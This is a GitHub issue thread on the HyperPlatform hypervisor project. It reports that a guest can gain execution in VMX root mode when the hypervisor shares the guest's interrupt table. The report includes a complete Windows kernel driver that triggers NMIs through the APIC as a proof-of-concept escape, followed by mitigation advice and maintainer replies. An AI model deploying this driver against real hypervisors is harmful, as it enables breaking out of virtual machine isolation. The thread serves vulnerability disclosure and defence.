### ISSUE TITLE
Hypervisors escape

### ISSUE THREAD

**Issue by yourapple** [tandasat/HyperPlatform#87]
Many lightweight hypervisors choose to share the Interrupt Descriptor Table and Interrupt Controller with the guest. This eliminates significant work for the hypervisor developer because then they do not need to virtualize these resources. Well convenient, this is a very insecure design choice and should be avoided in all production hypervisors without exception. The reason this is such an insecure design is because the guest has complete control over these resources that the hypervisor is depending on for proper, secure operation. The guest can weaponize these resources to get control over the hypervisor.

The Example Code:

```
#define _AMD64_
#include <ntddk.h>
#include <intrin.h>
 
#define X2_MSR_BASE 0x800
#define ICROffset 0x300
#define TO_X2( x ) ( x / 0x10 )
 
PVOID NMICallbackHandle = nullptr;
PVOID threadhandle = nullptr;
int escaped = 0;
void( *TriggerNMI )( UINT32, UINT32 ) = nullptr;
void *apicBase = nullptr;
 
BOOLEAN NMICallback( PVOID context, BOOLEAN handled )
{
	size_t vmcslink = 0;
	__try
	{
		if( !__vmx_vmread( 0x00002800, &vmcslink ) )
		{
			if( vmcslink != 0 )
				_InterlockedOr( ( volatile LONG* )&escaped, ( 1 << KeGetCurrentProcessorIndex( ) ) );
		}
	}
	__except( 1 )
	{
	}
	return TRUE;
}
 
void XTriggerNMI( UINT32 low, UINT32 high )
{
	*( UINT32* )( ( uintptr_t )apicBase + ICROffset + 0x10 ) = high;
	*( UINT32* )( ( uintptr_t )apicBase + ICROffset        ) = low;
}
 
void X2TriggerNMI( UINT32 low, UINT32 high )
{
	__writemsr( X2_MSR_BASE + TO_X2( ICROffset ), ( ( UINT64 )high << 32 ) | low );
}
 
INT32 InitializeAPIC( void )
{
	UINT64 apicBaseMSR = __readmsr( 0x1B );
	if( !(apicBaseMSR & ( 1 << 11 ) ) )
		return STATUS_FAILED_DRIVER_ENTRY;
	
	if( apicBaseMSR & ( 1 << 10 ) )
	{
		TriggerNMI = X2TriggerNMI;
		return STATUS_FAILED_DRIVER_ENTRY;
	}
	else
	{
		PHYSICAL_ADDRESS paAPICBase;
		paAPICBase.QuadPart = apicBaseMSR & 0xFFFFFF000;
		apicBase = MmMapIoSpace( paAPICBase, 0x1000, MmNonCached );
		if( !apicBase )
			return STATUS_FAILED_DRIVER_ENTRY;
		TriggerNMI = XTriggerNMI;
	}
	return STATUS_SUCCESS;
}
ULONG_PTR IPIHandler( ULONG_PTR context )
{
	if( escaped != ( 1 << KeNumberProcessors ) - 2 )
	{
		if( KeGetCurrentProcessorIndex( ) != 0 )
		{
			int cpuid[ 4 ] = { };
			__cpuid( cpuid, 0 );
		}
		else
		{
			TriggerNMI( ( 4 << 8 ) | ( 1 << 14 ) | ( 3 << 18 ), 0 );
		}
	}
	else
	{
		//really at this point we could just specifically interrupt core 0, but you can add that if you want
		if( KeGetCurrentProcessorIndex( ) == 0 )
		{
			int cpuid[ 4 ] = { };
			__cpuid( cpuid, 0 );
		}
		else
		{
			TriggerNMI( ( 4 << 8 ) | ( 1 << 14 ) | ( 3 << 18 ), 0 );
		}
	}
	return 0;
}
 
void kthread( void* )
{
	do
	{
		KeIpiGenericCall( IPIHandler, 0 );
	} while( escaped != ( ( 1 << KeNumberProcessors ) - 1 ) );
	PsTerminateSystemThread( 0 );
}
 
void DriverUnload( PDRIVER_OBJECT object )
{
	if( threadhandle )
	{
		void* obj = nullptr;
		if( NT_SUCCESS( ObReferenceObjectByHandle( threadhandle, THREAD_ALL_ACCESS, nullptr, KernelMode, &obj, nullptr ) ) )
		{
			KeWaitForSingleObject( obj, Executive, KernelMode, FALSE, nullptr );
			ObDereferenceObject( obj );
			ZwClose( threadhandle );
		}
	}
	if( NMICallbackHandle ) KeDeregisterNmiCallback( NMICallbackHandle );
	if( apicBase ) MmUnmapIoSpace( apicBase, 0x1000 );
	for( int i = 0; i < KeNumberProcessors; i++ )
	{
		if( escaped & ( 1 << i ) )
			DbgPrint( "Core %i escaped\n", i );
	}
	return;
}
 
NTSTATUS DriverEntry( PDRIVER_OBJECT object, PUNICODE_STRING path )
{
	object->DriverUnload = DriverUnload;
	InitializeAPIC( );
	NMICallbackHandle = KeRegisterNmiCallback( NMICallback, nullptr );
	if( !NMICallbackHandle )
		return STATUS_FAILED_DRIVER_ENTRY;
	return PsCreateSystemThread( &threadhandle, 0, 0, 0, 0, kthread, 0 );
}
```

The Solution

How do we prevent this from happening?

For a lightweight hypervisor with only a single guest an easy way to counteract this is to have the hypervisor use its own Interrupt Descriptor Table and non-maskable interrupt handler and inject the interrupt into the guest. This will prevent the guest from ever getting execution control under the context of the hypervisor.

The proper way to handle this though is all of the aforementioned along with virtualizing the Interrupt Controller for each guest.

**Comment by hypervisor** [comment]
This code is copy pasted from another researcher, and you are completely wrong. Yoy don't need to virtualize anything to fix this, simply set up a host IDT(R) with ISRs. I think everyone understands you can't use HyperPlatform as a production hypervisor, there are many other similar ways to escape/DoS it.

**Comment by tandasat** [comment]
Closing this as addressing this specific issue helps nobody.  

Firstly, thanks for bringing up this discussion. That's right that sending NMI from one core may lead to arbitrary code execution on the VMX root mode on the other core, and having hosts' own IDT and ISRs will be a way to prevent that.  

At the same time, as @hypervisor mentioned, this project makes no attempt to establish a security boundary between ring-0 VMX non-root mode and VMX root mode, and thus, there are countless of ways to achieve the same effect. For example, the guest can modify hypervisor code and data (such as page tables) without any problem. Preventing this specific vector does not help anything, and I will not change the design to properly isolate the host from the guest.

Finally, you should credit and/or refer to [the original post on this topic](https://www.unknowncheats.me/forum/c-and-c-/390593-vm-escape-via-nmi.html#post2772568), instead of straight copy and pasting it. That damages your credibility. 

Thanks.

**Comment by yourapple** [comment]
Sorry, it is true that I saw this problem from another author. I was negligent on this point. I am going to modify the description of this problem.
